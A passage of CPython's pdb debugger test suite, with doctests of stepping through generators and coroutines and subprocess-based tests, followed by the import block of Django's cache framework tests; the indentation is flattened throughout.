... test_function_2()
... end = 1
>>> reset_Breakpoint()
>>> with PdbTestInput(['break test_function_2',
... 'continue',
... 'return',
... 'next',
... 'continue',
... 'return',
... 'until',
... 'continue',
... 'return',
... 'return',
... 'continue']):
... test_function()
> <doctest test.test_pdb.test_next_until_return_at_return_event[1]>(3)test_function()
-> test_function_2()
(Pdb) break test_function_2
Breakpoint 1 at <doctest test.test_pdb.test_next_until_return_at_return_event[0]>:1
(Pdb) continue
> <doctest test.test_pdb.test_next_until_return_at_return_event[0]>(2)test_function_2()
-> x = 1
(Pdb) return
--Return--
> <doctest test.test_pdb.test_next_until_return_at_return_event[0]>(3)test_function_2()->None
-> x = 2
(Pdb) next
> <doctest test.test_pdb.test_next_until_return_at_return_event[1]>(4)test_function()
-> test_function_2()
(Pdb) continue
> <doctest test.test_pdb.test_next_until_return_at_return_event[0]>(2)test_function_2()
-> x = 1
(Pdb) return
--Return--
> <doctest test.test_pdb.test_next_until_return_at_return_event[0]>(3)test_function_2()->None
-> x = 2
(Pdb) until
> <doctest test.test_pdb.test_next_until_return_at_return_event[1]>(5)test_function()
-> test_function_2()
(Pdb) continue
> <doctest test.test_pdb.test_next_until_return_at_return_event[0]>(2)test_function_2()
-> x = 1
(Pdb) return
--Return--
> <doctest test.test_pdb.test_next_until_return_at_return_event[0]>(3)test_function_2()->None
-> x = 2
(Pdb) return
> <doctest test.test_pdb.test_next_until_return_at_return_event[1]>(6)test_function()
-> end = 1
(Pdb) continue
"""
def test_pdb_next_command_for_generator():
"""Testing skip unwindng stack on yield for generators for "next" command
>>> def test_gen():
... yield 0
... return 1
... yield 2
>>> def test_function():
... import pdb; pdb.Pdb(nosigint=True, readrc=False).set_trace()
... it = test_gen()
... try:
... if next(it) != 0:
... raise AssertionError
... next(it)
... except StopIteration as ex:
... if ex.value != 1:
... raise AssertionError
... print("finished")
>>> with PdbTestInput(['step',
... 'step',
... 'step',
... 'next',
... 'next',
... 'step',
... 'step',
... 'continue']):
... test_function()
> <doctest test.test_pdb.test_pdb_next_command_for_generator[1]>(3)test_function()
-> it = test_gen()
(Pdb) step
> <doctest test.test_pdb.test_pdb_next_command_for_generator[1]>(4)test_function()
-> try:
(Pdb) step
> <doctest test.test_pdb.test_pdb_next_command_for_generator[1]>(5)test_function()
-> if next(it) != 0:
(Pdb) step
--Call--
> <doctest test.test_pdb.test_pdb_next_command_for_generator[0]>(1)test_gen()
-> def test_gen():
(Pdb) next
> <doctest test.test_pdb.test_pdb_next_command_for_generator[0]>(2)test_gen()
-> yield 0
(Pdb) next
> <doctest test.test_pdb.test_pdb_next_command_for_generator[0]>(3)test_gen()
-> return 1
(Pdb) step
--Return--
> <doctest test.test_pdb.test_pdb_next_command_for_generator[0]>(3)test_gen()->1
-> return 1
(Pdb) step
StopIteration: 1
> <doctest test.test_pdb.test_pdb_next_command_for_generator[1]>(7)test_function()
-> next(it)
(Pdb) continue
finished
"""
def test_pdb_next_command_for_coroutine():
"""Testing skip unwindng stack on yield for coroutines for "next" command
>>> import asyncio
>>> async def test_coro():
... await asyncio.sleep(0)
... await asyncio.sleep(0)
... await asyncio.sleep(0)
>>> async def test_main():
... import pdb; pdb.Pdb(nosigint=True, readrc=False).set_trace()
... await test_coro()
>>> def test_function():
... loop = asyncio.new_event_loop()
... loop.run_until_complete(test_main())
... loop.close()
... asyncio.set_event_loop_policy(None)
... print("finished")
>>> with PdbTestInput(['step',
... 'step',
... 'next',
... 'next',
... 'next',
... 'step',
... 'continue']):
... test_function()
> <doctest test.test_pdb.test_pdb_next_command_for_coroutine[2]>(3)test_main()
-> await test_coro()
(Pdb) step
--Call--
> <doctest test.test_pdb.test_pdb_next_command_for_coroutine[1]>(1)test_coro()
-> async def test_coro():
(Pdb) step
> <doctest test.test_pdb.test_pdb_next_command_for_coroutine[1]>(2)test_coro()
-> await asyncio.sleep(0)
(Pdb) next
> <doctest test.test_pdb.test_pdb_next_command_for_coroutine[1]>(3)test_coro()
-> await asyncio.sleep(0)
(Pdb) next
> <doctest test.test_pdb.test_pdb_next_command_for_coroutine[1]>(4)test_coro()
-> await asyncio.sleep(0)
(Pdb) next
Internal StopIteration
> <doctest test.test_pdb.test_pdb_next_command_for_coroutine[2]>(3)test_main()
-> await test_coro()
(Pdb) step
--Return--
> <doctest test.test_pdb.test_pdb_next_command_for_coroutine[2]>(3)test_main()->None
-> await test_coro()
(Pdb) continue
finished
"""
def test_pdb_next_command_for_asyncgen():
"""Testing skip unwindng stack on yield for coroutines for "next" command
>>> import asyncio
>>> async def agen():
... yield 1
... await asyncio.sleep(0)
... yield 2
>>> async def test_coro():
... async for x in agen():
... print(x)
>>> async def test_main():
... import pdb; pdb.Pdb(nosigint=True, readrc=False).set_trace()
... await test_coro()
>>> def test_function():
... loop = asyncio.new_event_loop()
... loop.run_until_complete(test_main())
... loop.close()
... asyncio.set_event_loop_policy(None)
... print("finished")
>>> with PdbTestInput(['step',
... 'step',
... 'next',
... 'next',
... 'step',
... 'next',
... 'continue']):
... test_function()
> <doctest test.test_pdb.test_pdb_next_command_for_asyncgen[3]>(3)test_main()
-> await test_coro()
(Pdb) step
--Call--
> <doctest test.test_pdb.test_pdb_next_command_for_asyncgen[2]>(1)test_coro()
-> async def test_coro():
(Pdb) step
> <doctest test.test_pdb.test_pdb_next_command_for_asyncgen[2]>(2)test_coro()
-> async for x in agen():
(Pdb) next
> <doctest test.test_pdb.test_pdb_next_command_for_asyncgen[2]>(3)test_coro()
-> print(x)
(Pdb) next
1
> <doctest test.test_pdb.test_pdb_next_command_for_asyncgen[2]>(2)test_coro()
-> async for x in agen():
(Pdb) step
--Call--
> <doctest test.test_pdb.test_pdb_next_command_for_asyncgen[1]>(2)agen()
-> yield 1
(Pdb) next
> <doctest test.test_pdb.test_pdb_next_command_for_asyncgen[1]>(3)agen()
-> await asyncio.sleep(0)
(Pdb) continue
2
finished
"""
def test_pdb_return_command_for_generator():
"""Testing no unwindng stack on yield for generators
for "return" command
>>> def test_gen():
... yield 0
... return 1
... yield 2
>>> def test_function():
... import pdb; pdb.Pdb(nosigint=True, readrc=False).set_trace()
... it = test_gen()
... try:
... if next(it) != 0:
... raise AssertionError
... next(it)
... except StopIteration as ex:
... if ex.value != 1:
... raise AssertionError
... print("finished")
>>> with PdbTestInput(['step',
... 'step',
... 'step',
... 'return',
... 'step',
... 'step',
... 'continue']):
... test_function()
> <doctest test.test_pdb.test_pdb_return_command_for_generator[1]>(3)test_function()
-> it = test_gen()
(Pdb) step
> <doctest test.test_pdb.test_pdb_return_command_for_generator[1]>(4)test_function()
-> try:
(Pdb) step
> <doctest test.test_pdb.test_pdb_return_command_for_generator[1]>(5)test_function()
-> if next(it) != 0:
(Pdb) step
--Call--
> <doctest test.test_pdb.test_pdb_return_command_for_generator[0]>(1)test_gen()
-> def test_gen():
(Pdb) return
StopIteration: 1
> <doctest test.test_pdb.test_pdb_return_command_for_generator[1]>(7)test_function()
-> next(it)
(Pdb) step
> <doctest test.test_pdb.test_pdb_return_command_for_generator[1]>(8)test_function()
-> except StopIteration as ex:
(Pdb) step
> <doctest test.test_pdb.test_pdb_return_command_for_generator[1]>(9)test_function()
-> if ex.value != 1:
(Pdb) continue
finished
"""
def test_pdb_return_command_for_coroutine():
"""Testing no unwindng stack on yield for coroutines for "return" command
>>> import asyncio
>>> async def test_coro():
... await asyncio.sleep(0)
... await asyncio.sleep(0)
... await asyncio.sleep(0)
>>> async def test_main():
... import pdb; pdb.Pdb(nosigint=True, readrc=False).set_trace()
... await test_coro()
>>> def test_function():
... loop = asyncio.new_event_loop()
... loop.run_until_complete(test_main())
... loop.close()
... asyncio.set_event_loop_policy(None)
... print("finished")
>>> with PdbTestInput(['step',
... 'step',
... 'next',
... 'continue']):
... test_function()
> <doctest test.test_pdb.test_pdb_return_command_for_coroutine[2]>(3)test_main()
-> await test_coro()
(Pdb) step
--Call--
> <doctest test.test_pdb.test_pdb_return_command_for_coroutine[1]>(1)test_coro()
-> async def test_coro():
(Pdb) step
> <doctest test.test_pdb.test_pdb_return_command_for_coroutine[1]>(2)test_coro()
-> await asyncio.sleep(0)
(Pdb) next
> <doctest test.test_pdb.test_pdb_return_command_for_coroutine[1]>(3)test_coro()
-> await asyncio.sleep(0)
(Pdb) continue
finished
"""
def test_pdb_until_command_for_generator():
"""Testing no unwindng stack on yield for generators
for "until" command if target breakpoint is not reached
>>> def test_gen():
... yield 0
... yield 1
... yield 2
>>> def test_function():
... import pdb; pdb.Pdb(nosigint=True, readrc=False).set_trace()
... for i in test_gen():
... print(i)
... print("finished")
>>> with PdbTestInput(['step',
... 'until 4',
... 'step',
... 'step',
... 'continue']):
... test_function()
> <doctest test.test_pdb.test_pdb_until_command_for_generator[1]>(3)test_function()
-> for i in test_gen():
(Pdb) step
--Call--
> <doctest test.test_pdb.test_pdb_until_command_for_generator[0]>(1)test_gen()
-> def test_gen():
(Pdb) until 4
0
1
> <doctest test.test_pdb.test_pdb_until_command_for_generator[0]>(4)test_gen()
-> yield 2
(Pdb) step
--Return--
> <doctest test.test_pdb.test_pdb_until_command_for_generator[0]>(4)test_gen()->2
-> yield 2
(Pdb) step
> <doctest test.test_pdb.test_pdb_until_command_for_generator[1]>(4)test_function()
-> print(i)
(Pdb) continue
2
finished
"""
def test_pdb_until_command_for_coroutine():
"""Testing no unwindng stack for coroutines
for "until" command if target breakpoint is not reached
>>> import asyncio
>>> async def test_coro():
... print(0)
... await asyncio.sleep(0)
... print(1)
... await asyncio.sleep(0)
... print(2)
... await asyncio.sleep(0)
... print(3)
>>> async def test_main():
... import pdb; pdb.Pdb(nosigint=True, readrc=False).set_trace()
... await test_coro()
>>> def test_function():
... loop = asyncio.new_event_loop()
... loop.run_until_complete(test_main())
... loop.close()
... asyncio.set_event_loop_policy(None)
... print("finished")
>>> with PdbTestInput(['step',
... 'until 8',
... 'continue']):
... test_function()
> <doctest test.test_pdb.test_pdb_until_command_for_coroutine[2]>(3)test_main()
-> await test_coro()
(Pdb) step
--Call--
> <doctest test.test_pdb.test_pdb_until_command_for_coroutine[1]>(1)test_coro()
-> async def test_coro():
(Pdb) until 8
0
1
2
> <doctest test.test_pdb.test_pdb_until_command_for_coroutine[1]>(8)test_coro()
-> print(3)
(Pdb) continue
3
finished
"""
def test_pdb_next_command_in_generator_for_loop():
"""The next command on returning from a generator controlled by a for loop.
>>> def test_gen():
... yield 0
... return 1
>>> def test_function():
... import pdb; pdb.Pdb(nosigint=True, readrc=False).set_trace()
... for i in test_gen():
... print('value', i)
... x = 123
>>> reset_Breakpoint()
>>> with PdbTestInput(['break test_gen',
... 'continue',
... 'next',
... 'next',
... 'next',
... 'continue']):
... test_function()
> <doctest test.test_pdb.test_pdb_next_command_in_generator_for_loop[1]>(3)test_function()
-> for i in test_gen():
(Pdb) break test_gen
Breakpoint 1 at <doctest test.test_pdb.test_pdb_next_command_in_generator_for_loop[0]>:1
(Pdb) continue
> <doctest test.test_pdb.test_pdb_next_command_in_generator_for_loop[0]>(2)test_gen()
-> yield 0
(Pdb) next
value 0
> <doctest test.test_pdb.test_pdb_next_command_in_generator_for_loop[0]>(3)test_gen()
-> return 1
(Pdb) next
Internal StopIteration: 1
> <doctest test.test_pdb.test_pdb_next_command_in_generator_for_loop[1]>(3)test_function()
-> for i in test_gen():
(Pdb) next
> <doctest test.test_pdb.test_pdb_next_command_in_generator_for_loop[1]>(5)test_function()
-> x = 123
(Pdb) continue
"""
def test_pdb_next_command_subiterator():
"""The next command in a generator with a subiterator.
>>> def test_subgenerator():
... yield 0
... return 1
>>> def test_gen():
... x = yield from test_subgenerator()
... return x
>>> def test_function():
... import pdb; pdb.Pdb(nosigint=True, readrc=False).set_trace()
... for i in test_gen():
... print('value', i)
... x = 123
>>> with PdbTestInput(['step',
... 'step',
... 'next',
... 'next',
... 'next',
... 'continue']):
... test_function()
> <doctest test.test_pdb.test_pdb_next_command_subiterator[2]>(3)test_function()
-> for i in test_gen():
(Pdb) step
--Call--
> <doctest test.test_pdb.test_pdb_next_command_subiterator[1]>(1)test_gen()
-> def test_gen():
(Pdb) step
> <doctest test.test_pdb.test_pdb_next_command_subiterator[1]>(2)test_gen()
-> x = yield from test_subgenerator()
(Pdb) next
value 0
> <doctest test.test_pdb.test_pdb_next_command_subiterator[1]>(3)test_gen()
-> return x
(Pdb) next
Internal StopIteration: 1
> <doctest test.test_pdb.test_pdb_next_command_subiterator[2]>(3)test_function()
-> for i in test_gen():
(Pdb) next
> <doctest test.test_pdb.test_pdb_next_command_subiterator[2]>(5)test_function()
-> x = 123
(Pdb) continue
"""
def test_pdb_issue_20766():
"""Test for reference leaks when the SIGINT handler is set.
>>> def test_function():
... i = 1
... while i <= 2:
... sess = pdb.Pdb()
... sess.set_trace(sys._getframe())
... print('pdb %d: %s' % (i, sess._previous_sigint_handler))
... i += 1
>>> reset_Breakpoint()
>>> with PdbTestInput(['continue',
... 'continue']):
... test_function()
> <doctest test.test_pdb.test_pdb_issue_20766[0]>(6)test_function()
-> print('pdb %d: %s' % (i, sess._previous_sigint_handler))
(Pdb) continue
pdb 1: <built-in function default_int_handler>
> <doctest test.test_pdb.test_pdb_issue_20766[0]>(6)test_function()
-> print('pdb %d: %s' % (i, sess._previous_sigint_handler))
(Pdb) continue
pdb 2: <built-in function default_int_handler>
"""
def test_pdb_issue_43318():
"""echo breakpoints cleared with filename:lineno
>>> def test_function():
... import pdb; pdb.Pdb(nosigint=True, readrc=False).set_trace()
... print(1)
... print(2)
... print(3)
... print(4)
>>> reset_Breakpoint()
>>> with PdbTestInput([ # doctest: +NORMALIZE_WHITESPACE
... 'break 3',
... 'clear <doctest test.test_pdb.test_pdb_issue_43318[0]>:3',
... 'continue'
... ]):
... test_function()
> <doctest test.test_pdb.test_pdb_issue_43318[0]>(3)test_function()
-> print(1)
(Pdb) break 3
Breakpoint 1 at <doctest test.test_pdb.test_pdb_issue_43318[0]>:3
(Pdb) clear <doctest test.test_pdb.test_pdb_issue_43318[0]>:3
Deleted breakpoint 1 at <doctest test.test_pdb.test_pdb_issue_43318[0]>:3
(Pdb) continue
1
2
3
4
"""
class PdbTestCase(unittest.TestCase):
def tearDown(self):
os_helper.unlink(os_helper.TESTFN)
def _run_pdb(self, pdb_args, commands):
self.addCleanup(os_helper.rmtree, '__pycache__')
cmd = [sys.executable, '-m', 'pdb'] + pdb_args
with subprocess.Popen(
cmd,
stdout=subprocess.PIPE,
stdin=subprocess.PIPE,
stderr=subprocess.STDOUT,
env = {**os.environ, 'PYTHONIOENCODING': 'utf-8'}
) as proc:
stdout, stderr = proc.communicate(str.encode(commands))
stdout = stdout and bytes.decode(stdout)
stderr = stderr and bytes.decode(stderr)
return stdout, stderr
def run_pdb_script(self, script, commands):
"""Run 'script' lines with pdb and the pdb 'commands'."""
filename = 'main.py'
with open(filename, 'w') as f:
f.write(textwrap.dedent(script))
self.addCleanup(os_helper.unlink, filename)
return self._run_pdb([filename], commands)
def run_pdb_module(self, script, commands):
"""Runs the script code as part of a module"""
self.module_name = 't_main'
os_helper.rmtree(self.module_name)
main_file = self.module_name + '/__main__.py'
init_file = self.module_name + '/__init__.py'
os.mkdir(self.module_name)
with open(init_file, 'w') as f:
pass
with open(main_file, 'w') as f:
f.write(textwrap.dedent(script))
self.addCleanup(os_helper.rmtree, self.module_name)
return self._run_pdb(['-m', self.module_name], commands)
def _assert_find_function(self, file_content, func_name, expected):
with open(os_helper.TESTFN, 'wb') as f:
f.write(file_content)
expected = None if not expected else (
expected[0], os_helper.TESTFN, expected[1])
self.assertEqual(
expected, pdb.find_function(func_name, os_helper.TESTFN))
def test_find_function_empty_file(self):
self._assert_find_function(b'', 'foo', None)
def test_find_function_found(self):
self._assert_find_function(
"""\
def foo():
pass
def bœr():
pass
def quux():
pass
""".encode(),
'bœr',
('bœr', 4),
)
def test_find_function_found_with_encoding_cookie(self):
self._assert_find_function(
"""\
# coding: iso-8859-15
def foo():
pass
def bœr():
pass
def quux():
pass
""".encode('iso-8859-15'),
'bœr',
('bœr', 5),
)
def test_find_function_found_with_bom(self):
self._assert_find_function(
codecs.BOM_UTF8 + """\
def bœr():
pass
""".encode(),
'bœr',
('bœr', 1),
)
def test_issue7964(self):
# open the file as binary so we can force \r\n newline
with open(os_helper.TESTFN, 'wb') as f:
f.write(b'print("testing my pdb")\r\n')
cmd = [sys.executable, '-m', 'pdb', os_helper.TESTFN]
proc = subprocess.Popen(cmd,
stdout=subprocess.PIPE,
stdin=subprocess.PIPE,
stderr=subprocess.STDOUT,
)
self.addCleanup(proc.stdout.close)
stdout, stderr = proc.communicate(b'quit\n')
self.assertNotIn(b'SyntaxError', stdout,
"Got a syntax error running test script under PDB")
def test_issue13183(self):
script = """
from bar import bar
def foo():
bar()
def nope():
pass
def foobar():
foo()
nope()
foobar()
"""
commands = """
from bar import bar
break bar
continue
step
step
quit
"""
bar = """
def bar():
pass
"""
with open('bar.py', 'w') as f:
f.write(textwrap.dedent(bar))
self.addCleanup(os_helper.unlink, 'bar.py')
stdout, stderr = self.run_pdb_script(script, commands)
self.assertTrue(
any('main.py(5)foo()->None' in l for l in stdout.splitlines()),
'Fail to step into the caller after a return')
def test_issue13120(self):
# Invoking "continue" on a non-main thread triggered an exception
# inside signal.signal.
with open(os_helper.TESTFN, 'wb') as f:
f.write(textwrap.dedent("""
import threading
import pdb
def start_pdb():
pdb.Pdb(readrc=False).set_trace()
x = 1
y = 1
t = threading.Thread(target=start_pdb)
t.start()""").encode('ascii'))
cmd = [sys.executable, '-u', os_helper.TESTFN]
proc = subprocess.Popen(cmd,
stdout=subprocess.PIPE,
stdin=subprocess.PIPE,
stderr=subprocess.STDOUT,
env={**os.environ, 'PYTHONIOENCODING': 'utf-8'}
)
self.addCleanup(proc.stdout.close)
stdout, stderr = proc.communicate(b'cont\n')
self.assertNotIn(b'Error', stdout,
"Got an error running test script under PDB")
def test_issue36250(self):
with open(os_helper.TESTFN, 'wb') as f:
f.write(textwrap.dedent("""
import threading
import pdb
evt = threading.Event()
def start_pdb():
evt.wait()
pdb.Pdb(readrc=False).set_trace()
t = threading.Thread(target=start_pdb)
t.start()
pdb.Pdb(readrc=False).set_trace()
evt.set()
t.join()""").encode('ascii'))
cmd = [sys.executable, '-u', os_helper.TESTFN]
proc = subprocess.Popen(cmd,
stdout=subprocess.PIPE,
stdin=subprocess.PIPE,
stderr=subprocess.STDOUT,
env = {**os.environ, 'PYTHONIOENCODING': 'utf-8'}
)
self.addCleanup(proc.stdout.close)
stdout, stderr = proc.communicate(b'cont\ncont\n')
self.assertNotIn(b'Error', stdout,
"Got an error running test script under PDB")
def test_issue16180(self):
# A syntax error in the debuggee.
script = "def f: pass\n"
commands = ''
expected = "SyntaxError:"
stdout, stderr = self.run_pdb_script(script, commands)
self.assertIn(expected, stdout,
'\n\nExpected:\n{}\nGot:\n{}\n'
'Fail to handle a syntax error in the debuggee.'
.format(expected, stdout))
def test_issue26053(self):
# run command of pdb prompt echoes the correct args
script = "print('hello')"
commands = """
continue
run a b c
run d e f
quit
"""
stdout, stderr = self.run_pdb_script(script, commands)
res = '\n'.join([x.strip() for x in stdout.splitlines()])
self.assertRegex(res, "Restarting .* with arguments:\na b c")
self.assertRegex(res, "Restarting .* with arguments:\nd e f")
def test_readrc_kwarg(self):
script = textwrap.dedent("""
import pdb; pdb.Pdb(readrc=False).set_trace()
print('hello')
""")
save_home = os.environ.pop('HOME', None)
try:
with os_helper.temp_cwd():
with open('.pdbrc', 'w') as f:
f.write("invalid\n")
with open('main.py', 'w') as f:
f.write(script)
cmd = [sys.executable, 'main.py']
proc = subprocess.Popen(
cmd,
stdout=subprocess.PIPE,
stdin=subprocess.PIPE,
stderr=subprocess.PIPE,
)
with proc:
stdout, stderr = proc.communicate(b'q\n')
self.assertNotIn(b"NameError: name 'invalid' is not defined",
stdout)
finally:
if save_home is not None:
os.environ['HOME'] = save_home
def test_readrc_homedir(self):
save_home = os.environ.pop("HOME", None)
with os_helper.temp_dir() as temp_dir, patch("os.path.expanduser"):
rc_path = os.path.join(temp_dir, ".pdbrc")
os.path.expanduser.return_value = rc_path
try:
with open(rc_path, "w") as f:
f.write("invalid")
self.assertEqual(pdb.Pdb().rcLines[0], "invalid")
finally:
if save_home is not None:
os.environ["HOME"] = save_home
def test_read_pdbrc_with_ascii_encoding(self):
script = textwrap.dedent("""
import pdb; pdb.Pdb().set_trace()
print('hello')
""")
save_home = os.environ.pop('HOME', None)
try:
with os_helper.temp_cwd():
with open('.pdbrc', 'w', encoding='utf-8') as f:
f.write("Fran\u00E7ais")
with open('main.py', 'w', encoding='utf-8') as f:
f.write(script)
cmd = [sys.executable, 'main.py']
env = {'PYTHONIOENCODING': 'ascii'}
if sys.platform == 'win32':
env['PYTHONLEGACYWINDOWSSTDIO'] = 'non-empty-string'
proc = subprocess.Popen(
cmd,
stdout=subprocess.PIPE,
stdin=subprocess.PIPE,
stderr=subprocess.PIPE,
env={**os.environ, **env}
)
with proc:
stdout, stderr = proc.communicate(b'c\n')
self.assertIn(b"UnicodeEncodeError: \'ascii\' codec can\'t encode character "
b"\'\\xe7\' in position 21: ordinal not in range(128)", stderr)
finally:
if save_home is not None:
os.environ['HOME'] = save_home
def test_header(self):
stdout = StringIO()
header = 'Nobody expects... blah, blah, blah'
with ExitStack() as resources:
resources.enter_context(patch('sys.stdout', stdout))
resources.enter_context(patch.object(pdb.Pdb, 'set_trace'))
pdb.set_trace(header=header)
self.assertEqual(stdout.getvalue(), header + '\n')
def test_run_module(self):
script = """print("SUCCESS")"""
commands = """
continue
quit
"""
stdout, stderr = self.run_pdb_module(script, commands)
self.assertTrue(any("SUCCESS" in l for l in stdout.splitlines()), stdout)
def test_module_is_run_as_main(self):
script = """
if __name__ == '__main__':
print("SUCCESS")
"""
commands = """
continue
quit
"""
stdout, stderr = self.run_pdb_module(script, commands)
self.assertTrue(any("SUCCESS" in l for l in stdout.splitlines()), stdout)
def test_breakpoint(self):
script = """
if __name__ == '__main__':
pass
print("SUCCESS")
pass
"""
commands = """
b 3
quit
"""
stdout, stderr = self.run_pdb_module(script, commands)
self.assertTrue(any("Breakpoint 1 at" in l for l in stdout.splitlines()), stdout)
self.assertTrue(all("SUCCESS" not in l for l in stdout.splitlines()), stdout)
def test_run_pdb_with_pdb(self):
commands = """
c
quit
"""
stdout, stderr = self._run_pdb(["-m", "pdb"], commands)
self.assertIn(
pdb._usage,
stdout.replace('\r', '') # remove \r for windows
)
def test_module_without_a_main(self):
module_name = 't_main'
os_helper.rmtree(module_name)
init_file = module_name + '/__init__.py'
os.mkdir(module_name)
with open(init_file, 'w') as f:
pass
self.addCleanup(os_helper.rmtree, module_name)
stdout, stderr = self._run_pdb(['-m', module_name], "")
self.assertIn("ImportError: No module named t_main.__main__",
stdout.splitlines())
def test_package_without_a_main(self):
pkg_name = 't_pkg'
module_name = 't_main'
os_helper.rmtree(pkg_name)
modpath = pkg_name + '/' + module_name
os.makedirs(modpath)
with open(modpath + '/__init__.py', 'w') as f:
pass
self.addCleanup(os_helper.rmtree, pkg_name)
stdout, stderr = self._run_pdb(['-m', modpath.replace('/', '.')], "")
self.assertIn(
"'t_pkg.t_main' is a package and cannot be directly executed",
stdout)
def test_blocks_at_first_code_line(self):
script = """
#This is a comment, on line 2
print("SUCCESS")
"""
commands = """
quit
"""
stdout, stderr = self.run_pdb_module(script, commands)
self.assertTrue(any("__main__.py(4)<module>()"
in l for l in stdout.splitlines()), stdout)
def test_relative_imports(self):
self.module_name = 't_main'
os_helper.rmtree(self.module_name)
main_file = self.module_name + '/__main__.py'
init_file = self.module_name + '/__init__.py'
module_file = self.module_name + '/module.py'
self.addCleanup(os_helper.rmtree, self.module_name)
os.mkdir(self.module_name)
with open(init_file, 'w') as f:
f.write(textwrap.dedent("""
top_var = "VAR from top"
"""))
with open(main_file, 'w') as f:
f.write(textwrap.dedent("""
from . import top_var
from .module import var
from . import module
pass # We'll stop here and print the vars
"""))
with open(module_file, 'w') as f:
f.write(textwrap.dedent("""
var = "VAR from module"
var2 = "second var"
"""))
commands = """
b 5
c
p top_var
p var
p module.var2
quit
"""
stdout, _ = self._run_pdb(['-m', self.module_name], commands)
self.assertTrue(any("VAR from module" in l for l in stdout.splitlines()), stdout)
self.assertTrue(any("VAR from top" in l for l in stdout.splitlines()))
self.assertTrue(any("second var" in l for l in stdout.splitlines()))
def test_relative_imports_on_plain_module(self):
# Validates running a plain module. See bpo32691
self.module_name = 't_main'
os_helper.rmtree(self.module_name)
main_file = self.module_name + '/runme.py'
init_file = self.module_name + '/__init__.py'
module_file = self.module_name + '/module.py'
self.addCleanup(os_helper.rmtree, self.module_name)
os.mkdir(self.module_name)
with open(init_file, 'w') as f:
f.write(textwrap.dedent("""
top_var = "VAR from top"
"""))
with open(main_file, 'w') as f:
f.write(textwrap.dedent("""
from . import module
pass # We'll stop here and print the vars
"""))
with open(module_file, 'w') as f:
f.write(textwrap.dedent("""
var = "VAR from module"
"""))
commands = """
b 3
c
p module.var
quit
"""
stdout, _ = self._run_pdb(['-m', self.module_name + '.runme'], commands)
self.assertTrue(any("VAR from module" in l for l in stdout.splitlines()), stdout)
def test_errors_in_command(self):
commands = "\n".join([
'print(',
'debug print(',
'debug doesnotexist',
'c',
])
stdout, _ = self.run_pdb_script('pass', commands + '\n')
self.assertEqual(stdout.splitlines()[1:], [
'-> pass',
'(Pdb) *** SyntaxError: \'(\' was never closed',
'(Pdb) ENTERING RECURSIVE DEBUGGER',
'*** SyntaxError: \'(\' was never closed',
'LEAVING RECURSIVE DEBUGGER',
'(Pdb) ENTERING RECURSIVE DEBUGGER',
'> <string>(1)<module>()',
"((Pdb)) *** NameError: name 'doesnotexist' is not defined",
'LEAVING RECURSIVE DEBUGGER',
'(Pdb) ',
])
def test_issue34266(self):
'''do_run handles exceptions from parsing its arg'''
def check(bad_arg, msg):
commands = "\n".join([
f'run {bad_arg}',
'q',
])
stdout, _ = self.run_pdb_script('pass', commands + '\n')
self.assertEqual(stdout.splitlines()[1:], [
'-> pass',
f'(Pdb) *** Cannot run {bad_arg}: {msg}',
'(Pdb) ',
])
check('\\', 'No escaped character')
check('"', 'No closing quotation')
def test_issue42384(self):
'''When running `python foo.py` sys.path[0] is an absolute path. `python -m pdb foo.py` should behave the same'''
script = textwrap.dedent("""
import sys
print('sys.path[0] is', sys.path[0])
""")
commands = 'c\nq'
with os_helper.temp_cwd() as cwd:
expected = f'(Pdb) sys.path[0] is {os.path.realpath(cwd)}'
stdout, stderr = self.run_pdb_script(script, commands)
self.assertEqual(stdout.split('\n')[2].rstrip('\r'), expected)
@os_helper.skip_unless_symlink
def test_issue42384_symlink(self):
'''When running `python foo.py` sys.path[0] resolves symlinks. `python -m pdb foo.py` should behave the same'''
script = textwrap.dedent("""
import sys
print('sys.path[0] is', sys.path[0])
""")
commands = 'c\nq'
with os_helper.temp_cwd() as cwd:
cwd = os.path.realpath(cwd)
dir_one = os.path.join(cwd, 'dir_one')
dir_two = os.path.join(cwd, 'dir_two')
expected = f'(Pdb) sys.path[0] is {dir_one}'
os.mkdir(dir_one)
with open(os.path.join(dir_one, 'foo.py'), 'w') as f:
f.write(script)
os.mkdir(dir_two)
os.symlink(os.path.join(dir_one, 'foo.py'), os.path.join(dir_two, 'foo.py'))
stdout, stderr = self._run_pdb([os.path.join('dir_two', 'foo.py')], commands)
self.assertEqual(stdout.split('\n')[2].rstrip('\r'), expected)
def test_issue42383(self):
with os_helper.temp_cwd() as cwd:
with open('foo.py', 'w') as f:
s = textwrap.dedent("""
print('The correct file was executed')
import os
os.chdir("subdir")
""")
f.write(s)
subdir = os.path.join(cwd, 'subdir')
os.mkdir(subdir)
os.mkdir(os.path.join(subdir, 'subdir'))
wrong_file = os.path.join(subdir, 'foo.py')
with open(wrong_file, 'w') as f:
f.write('print("The wrong file was executed")')
stdout, stderr = self._run_pdb(['foo.py'], 'c\nc\nq')
expected = '(Pdb) The correct file was executed'
self.assertEqual(stdout.split('\n')[6].rstrip('\r'), expected)
class ChecklineTests(unittest.TestCase):
def setUp(self):
linecache.clearcache() # Pdb.checkline() uses linecache.getline()
def tearDown(self):
os_helper.unlink(os_helper.TESTFN)
def test_checkline_before_debugging(self):
with open(os_helper.TESTFN, "w") as f:
f.write("print(123)")
db = pdb.Pdb()
self.assertEqual(db.checkline(os_helper.TESTFN, 1), 1)
def test_checkline_after_reset(self):
with open(os_helper.TESTFN, "w") as f:
f.write("print(123)")
db = pdb.Pdb()
db.reset()
self.assertEqual(db.checkline(os_helper.TESTFN, 1), 1)
def test_checkline_is_not_executable(self):
with open(os_helper.TESTFN, "w") as f:
# Test for comments, docstrings and empty lines
s = textwrap.dedent("""
# Comment
\"\"\" docstring \"\"\"
''' docstring '''
""")
f.write(s)
db = pdb.Pdb()
num_lines = len(s.splitlines()) + 2 # Test for EOF
for lineno in range(num_lines):
self.assertFalse(db.checkline(os_helper.TESTFN, lineno))
def load_tests(loader, tests, pattern):
from test import test_pdb
tests.addTest(doctest.DocTestSuite(test_pdb))
return tests
if __name__ == '__main__':
unittest.main()
|
tests.py | # -*- coding: utf-8 -*-
# Unit tests for cache framework
# Uses whatever cache backend is set in the test settings file.
from __future__ import unicode_literals
import copy
import os
import re
import shutil
import tempfile
import threading
import time
import unittest
import warnings
from django.conf import settings
from django.core import management, signals
from django.core.cache import (
DEFAULT_CACHE_ALIAS, CacheKeyWarning, cache, caches,
)
from django.core.cache.utils import make_template_fragment_key
from django.db import connection, connections
from django.http import HttpRequest, HttpResponse, StreamingHttpResponse
from django.middleware.cache import (
CacheMiddleware, FetchFromCacheMiddleware, UpdateCacheMiddleware,
)
from django.middleware.csrf import CsrfViewMiddleware
from django.template import engines
